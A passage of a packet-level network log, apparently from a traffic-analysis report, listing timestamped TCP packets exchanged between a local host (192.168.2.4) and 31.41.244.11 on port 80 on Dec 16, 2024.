                                                                                                                                                                                              Dec 16, 2024 01:01:27.330965042 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.331063032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.331270933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.331293106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.331326008 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.331352949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.331392050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.331765890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.331788063 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.331849098 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.332525969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.332607985 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.333156109 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.333173037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.333257914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.333260059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.333311081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.334013939 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.334074020 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.334387064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.334438086 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.334857941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.335378885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.335458040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.335656881 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.335716009 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.335823059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.335879087 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.336525917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.336577892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.336699009 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.336749077 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.337338924 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.337503910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.337565899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.338186979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.338494062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.338951111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.339008093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.339118958 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.339137077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.339188099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.339225054 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.339909077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.340061903 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.340719938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.340738058 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.340795040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.340831995 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.340883970 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.341628075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.341645956 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.341712952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.342500925 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.342518091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.342557907 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.342603922 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.343238115 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.343796015 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.343864918 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.344120026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.344136953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.344181061 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.344209909 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.344896078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.345499039 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.345638990 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.345690012 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.345772982 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.345791101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.345829964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.345830917 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.346626997 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.346645117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.346683025 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.346683979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.347459078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.347476006 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.347527981 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.348252058 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.349143982 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.349160910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.349234104 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.349235058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.349235058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.349275112 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.349977970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.349994898 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.350063086 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.350064039 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.350819111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.350836039 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.350908995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.351710081 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.351728916 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.351777077 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.351818085 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.352467060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.352902889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.352982044 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.353295088 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.353363037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.354156017 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.354172945 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.354265928 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.354279041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.354336023 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.355001926 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.355020046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.355071068 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.355102062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.355806112 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.356669903 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.356692076 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.356740952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.356774092 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.356787920 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.357183933 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.357525110 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.357542038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.357578993 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.357609987 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.358381987 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.358400106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.358453035 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.359167099 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.359220982 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.359667063 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.359721899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.360004902 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.360057116 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.360868931 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.360887051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.360918999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.360951900 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.360975027 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.361102104 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.361742020 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.361757994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.361793041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.361824989 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.362538099 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.363226891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.363281965 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.363384008 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.363399982 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.363445044 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.364247084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.364300013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.364428043 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.364494085 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.365032911 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.365139961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.365879059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.365940094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.365991116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.366008043 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.366041899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.366075039 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.366720915 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.366774082 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.367193937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.367410898 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.367608070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.367624998 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.367672920 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.368413925 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.369277000 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.369292974 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.369359970 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.369374037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.369379997 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.369441032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.370089054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.370167971 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.370948076 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.370964050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.371027946 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.371043921 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.371097088 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.371778965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.371854067 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.465152979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.465172052 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.465208054 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.465209007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.465328932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.465394020 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.465420008 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.465467930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.466161013 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.466208935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.466254950 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.466308117 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.466990948 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.467072964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.467082024 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.467154026 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.523211002 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.523387909 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.523397923 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.523428917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.523459911 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.523473978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.523508072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.524300098 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.524753094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.525031090 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.525052071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.525093079 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.525093079 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.525300980 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.525453091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.525510073 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.526124954 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.526173115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.526354074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.526401043 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.526959896 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.527005911 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.527093887 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.527142048 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.527823925 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.527929068 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.527976036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.528667927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.528718948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.528816938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.528862000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.529472113 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.529520035 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.529881001 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.530337095 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.530385971 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.530994892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.531042099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.531181097 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.531199932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.531229019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.531260967 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.532008886 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.532054901 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.532861948 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.532880068 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.532915115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.532915115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.532974005 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.533018112 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.533710957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.534528017 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.534545898 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.534576893 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.534626007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.534631968 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.535373926 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.535423040 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.535835981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.535895109 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.536220074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.536237955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.536272049 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.536272049 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.537025928 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.537074089 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.537909031 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.537935019 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.537988901 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.538007021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.538050890 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.538721085 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.538769007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.539555073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.539577007 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.539603949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.539635897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.539700031 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.539747953 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.540393114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.540446043 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.541250944 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.541269064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.541297913 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.541330099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.541363001 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.541409969 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.542108059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.542125940 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.542171955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.542958021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.542975903 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.543005943 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.543037891 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:27.543778896 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:27.543829918 CET4980080192.168.2.431.41.244.11
